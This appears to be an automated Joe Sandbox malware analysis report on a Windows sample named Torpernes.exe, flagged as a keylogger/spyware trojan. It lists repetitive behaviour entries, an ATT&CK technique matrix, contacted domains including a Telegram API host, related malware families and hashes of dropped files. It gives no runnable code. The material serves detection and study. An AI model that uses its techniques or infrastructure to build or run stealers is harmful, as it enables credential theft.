Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | API/Special instruction interceptor: |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | API coverage: |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Last function: |
Source: | Code function: | 0_2_0040615C | |
Source: | Code function: | 0_2_004056A1 | |
Source: | Code function: | 0_2_00402770 | |
Source: | Code function: | 6_2_0040615C | |
Source: | Code function: | 6_2_00402770 | |
Source: | Code function: | 6_2_004056A1 |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | API call chain: | graph_0-3507 | ||
Source: | API call chain: | graph_0-3506 |
Source: | Process information queried: | Jump to behavior |
Source: | Process queried: | Jump to behavior |
Source: | Code function: | 6_2_00403B4F |
Source: | Code function: | 0_2_00406183 |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 0_2_00405E3B |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | File source: | ||
Source: | File source: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 3 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 1 Native API | 1 Registry Run Keys / Startup Folder | 111 Process Injection | 2 Obfuscated Files or Information | LSASS Memory | 115 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 1 Software Packing | Security Account Manager | 111 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 21 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Masquerading | LSA Secrets | 41 Virtualization/Sandbox Evasion | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Modify Registry | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 41 Virtualization/Sandbox Evasion | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 111 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
11% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
11% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
domzeleni.kz | 185.98.5.168 | true | false | unknown | |
reallyfreegeoip.org | 188.114.96.3 | true | true | unknown | |
api.telegram.org | 149.154.167.220 | true | true | unknown | |
checkip.dyndns.com | 158.101.44.242 | true | false | unknown | |
checkip.dyndns.org | unknown | unknown | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
false |
| unknown | |
false |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
true |
| unknown | ||
false |
| unknown | ||
true |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true | |
188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true | |
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false | |
185.98.5.168 | domzeleni.kz | Kazakhstan | 200532 | HOSTER-KZHosterKZ-hostinganddomainservicesinKazakhs | false |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1481480 |
Start date and time: | 2024-07-25 09:55:01 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 7m 38s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 11 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | Torpernes.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@11/11@4/4 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 7440 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
- VT rate limit hit for: Torpernes.exe
Time | Type | Description |
---|---|---|
03:55:55 | API Interceptor | |
03:56:45 | API Interceptor | |
08:56:38 | Autostart | |
08:56:46 | Autostart |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
149.154.167.220 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Snake Keylogger | Browse | |||
Get hash | malicious | DarkCloud, PureLog Stealer | Browse | |||
Get hash | malicious | AgentTesla, RedLine | Browse | |||
Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
188.114.96.3 | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
158.101.44.242 | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| |
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
reallyfreegeoip.org | Get hash | malicious | Snake Keylogger | Browse |
| |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
checkip.dyndns.com | Get hash | malicious | Snake Keylogger | Browse |
| |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
domzeleni.kz | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| |
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
api.telegram.org | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | DarkCloud, PureLog Stealer | Browse |
| ||
Get hash | malicious | AgentTesla, RedLine | Browse |
| ||
Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
TELEGRAMRU | Get hash | malicious | Hancitor, Vidar | Browse |
| |
Get hash | malicious | PureLog Stealer, Vidar | Browse |
| ||
Get hash | malicious | PureLog Stealer, Vidar | Browse |
| ||
Get hash | malicious | Vidar | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Bdaejec, Vidar | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | LummaC | Browse |
| |
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | CryptOne, Qbot | Browse |
| ||
Get hash | malicious | Raccoon | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Raccoon | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
ORACLE-BMC-31898US | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | Bdaejec | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
54328bd36c14bd82ddaa0c04b25ed9ad | Get hash | malicious | Snake Keylogger | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | PureLog Stealer | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Lokibot | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | AgentTesla | Browse |
| |
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Quasar | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | AteraAgent | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Blank Grabber, Umbral Stealer | Browse |
| ||
Get hash | malicious | PureLog Stealer | Browse |
| ||
37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | Bdaejec, DarkSide | Browse |
| |
Get hash | malicious | CryptOne, Qbot | Browse |
| ||
Get hash | malicious | Upatre | Browse |
| ||
Get hash | malicious | Hancitor, Vidar | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | PureLog Stealer, Vidar | Browse |
| ||
Get hash | malicious | PureLog Stealer, Vidar | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Vidar | Browse |
|
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 8003 |
Entropy (8bit): | 4.840877972214509 |
Encrypted: | false |
SSDEEP: | 192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J |
MD5: | 106D01F562D751E62B702803895E93E0 |
SHA1: | CBF19C2392BDFA8C2209F8534616CCA08EE01A92 |
SHA-256: | 6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D |
SHA-512: | 81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1283968 |
Entropy (8bit): | 7.384565087462512 |
Encrypted: | false |
SSDEEP: | 24576:qZbqxGFMhCGa7cQPncULq/YWx7k83oD1dEUu28KkzFu7biFA:ybqxGFMhCGa7cQ0ULxWx6MXLFgbi+ |
MD5: | ECC4FF0EE7D123F0E90587EA3A7B9AE3 |
SHA1: | 70E6F747F9BAE57619817BEB11F836FA8A873726 |
SHA-256: | 1E0A46FD7B7B0706D4D5918BA666ABDCCCC67BE4BE89874B5CB2CA9EA8B12A83 |
SHA-512: | 28F1D457D0A8556CF0BD62FC33556B22D3307E0527A25D451877BCAA9B76B1595D5170E5A221491007D2E8CA5E3A5F384C556F40830576DC942AA0252DBE8A71 |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | true |
Reputation: | high, very likely benign file |
Preview: |
C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem
Download File
Process: | C:\Users\user\Desktop\Torpernes.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 54418 |
Entropy (8bit): | 5.380872173369229 |
Encrypted: | false |
SSDEEP: | 1536:AsNKLSSANLNd+FFzONIjxMoqrnDlHIgiRYX3sJkLOcY:AFLSPE1MEI7K1YX3u0OcY |
MD5: | B77B0DEE3BF32770AF375C4C87E19478 |
SHA1: | D97F7CF179F27860AC856437F256D8A473497472 |
SHA-256: | 05CB2B925D951BF1348C00B0B69B21E9EA7F8C4F3022636E89EED64C043BAF78 |
SHA-512: | 2A389AF9BBC0A656F4FC1249E4F2ABDA08C578B54AB141308836D246BA9AE8CC9268E4182147692530EA39484BC794184321C355821654E39CC771B18D500A65 |
Malicious: | true |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Sildefdnings.pre
Download File
Process: | C:\Users\user\Desktop\Torpernes.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 328797 |
Entropy (8bit): | 7.815397462071498 |
Encrypted: | false |
